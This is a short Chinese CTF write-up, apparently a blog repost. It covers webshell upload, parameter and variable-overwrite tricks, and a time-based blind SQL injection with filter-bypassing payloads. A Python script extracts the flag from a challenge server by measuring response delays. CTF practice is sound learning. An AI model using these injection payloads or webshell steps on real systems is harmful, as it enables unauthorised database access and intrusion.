首页 > 其他分享 >check

check

时间:2024-01-12 22:25:45浏览次数:29  
标签:substr flag sleep time ascii check select

文件上传

上传一句话木马

蚁剑连接

根目录flag

GET传参

image-20240106202726987

image-20240106202850754

image-20240106202810616

?text=data:text/plain,welcome to the beijing&file=/flag&password=r

变量覆盖

image-20240106221403375

将flag的值赋给a 再让flag=a 输出flag

?a=flag&flag=a

sql

时间盲注查询数据库

id=1'/**/anandd/**/if((ascii(substr((select/**/database()),1,1)))>1,sleep(3),1)#
1'/**/anandd/**/if((ascii(substr((select/**/group_concat(table_name)from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),{},1)))={},sleep(2),1)#
1'/**/anandd/**/if((ascii(substr((select/**/group_concat(table_name)from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),{},1)))={},sleep(3),1)#
?id=1'/**/aandnd/**/if((ascii(substr((select/**/group_concat(ovoflag)/**/from/**/fl4gishere),{},1))),{},sleep(3),1)#
import requests
import time

url = "http://43.143.155.90:9801/index.php"
flag = ""

for i in range(1, 50):
    for j in range(96, 127):
        a = ("1'/**/aandnd/**/if((ascii(substr((select/**/group_concat(ovoflag)/**/from/**/fl4gishere),{},1)))={}"
             ",sleep(3),1)#").format(i, j)
        data = {'id': a}
        print(data)

        start_time = time.time()
        r = requests.post(url=url, data=data)
        end_time = time.time()
        sec = end_time - start_time
        time.sleep(1)
        if sec >= 2:
            flag = flag + chr(j)
            print(flag)
            break

ssti

反序列化

标签:substr,flag,sleep,time,ascii,check,select
From: https://www.cnblogs.com/ningweiyu/p/17961692

相关文章

  • [AGC022F] Checkers 题解
    题目链接点击打开链接题目解法很妙的题!!!考虑\(x\)是无穷大的数,所以可以认为\(x^i\)的系数是单独的一项,不会和\(x^j(j\neqi)\)合并所以问题转化成了:每个数初始是\(x^i\)(\(x\)可以理解是元),进行题目中的操作,问最后形成的\(n\)次多项式的个数由\(B\)向\(A\)连边,这......
  • onnx.onnx_cpp2py_export.checker.ValidationError
    onnx.onnx_cpp2py_export.checker.ValidationError引言在深度学习领域,模型转换和模型部署是非常关键的环节。OpenNeuralNetworkExchange(ONNX)是一种开放的深度学习模型表示和转换的标准,为不同深度学习框架之间的模型共享和使用提供了便利。在ONNX中,模型的正确性和兼容性是非......
  • MySQL Ignoring the redo log due to missing MLOG_CHECKPOINT between the checkpoin
    错误信息:2023-12-12T09:32:31.383149Z0[ERROR]InnoDB:IgnoringtheredologduetomissingMLOG_CHECKPOINTbetweenthecheckpoint5777611209andtheend5777612857.2023-12-12T09:32:31.384149Z0[ERROR]InnoDB:PlugininitializationabortedwitherrorGeneri......
  • AntDB设计之CheckPoint——引言与功能简述
    1.引言数据库服务能力提升是一项系统性的工程,在不同的应用场景下,用户对于数据库各项能力的关注点也不同,如:读写延迟、吞吐量、扩展性、可靠性、可用性等等。国内不少数据库系统通过系统架构优化、硬件设备升级等方式,来解决性能的问题,但随着集群规模的逐渐扩大,对系统健壮性的要求也越......
  • AntDB设计之CheckPoint——设计实现
    3.设计实现下文介绍CheckPoint是如何实现其设计目标以及设计要求的。1.不影响业务CheckPoint在执行过程中,不能阻塞数据库服务的正常访问。这意味着在CheckPoint的过程中,数据是一直在发生变化的。为了不阻塞对数据的修改,保障导出数据的一致性,我们在此引入CheckPoint状态和表缓存来解......
  • 【愚公系列】2024年01月 WPF控件专题 CheckBox控件详解
    ......
  • 2023NCTFcheck题解-关于可视化shellcode以及AE64真香
    以后我会尽量少用图片,因为我经常在翻别人博客时发现图片加载不出来,很烦。看看checksec再看看IDAint__cdeclmain(intargc,constchar**argv,constchar**envp){__int64v3;//rbx__int64v4;//rbx__int64v5;//rbxunsigned__int64v7;//[rsp+8h][rbp-2......
  • check the manual that corresponds to your MySQL server version for the right syn
    form:{repairstatus:0,name:'',//负责人maintenancetime:newDate().toISOString().split('T')[0],//保修时间equipmentid:'',equipment:'',describe:'',finfishtime:'',repairname:'�......
  • 记一次el-checkbox包裹一层div,点击div勾选复选框,点击复选框却没反应的bug
    <divclass="account-item"v-for="iteminaccountList":key="item.id":class="[{'is-select-mode':isSelectMode},{'is-select':item.isSelect}]"@click="selectItem......
  • GScan v0.1 被攻击入侵后 溯源 安全应急响应 Linux主机排查 实现主机侧Checklist的自
    GScanv0.1本程序旨在为安全应急响应人员对Linux主机排查时提供便利,实现主机侧Checklist的自动全面化检测,根据检测结果自动数据聚合,进行黑客攻击路径溯源。CheckList检测项自动化程序的CheckList项如下:1、主机信息获取2、系统初始化alias检查3、文件类安全扫描3.1、系统重要文......